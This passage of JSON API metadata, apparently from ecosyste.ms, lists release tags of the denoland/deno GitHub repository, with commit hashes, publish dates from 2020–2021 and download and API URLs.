tps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/re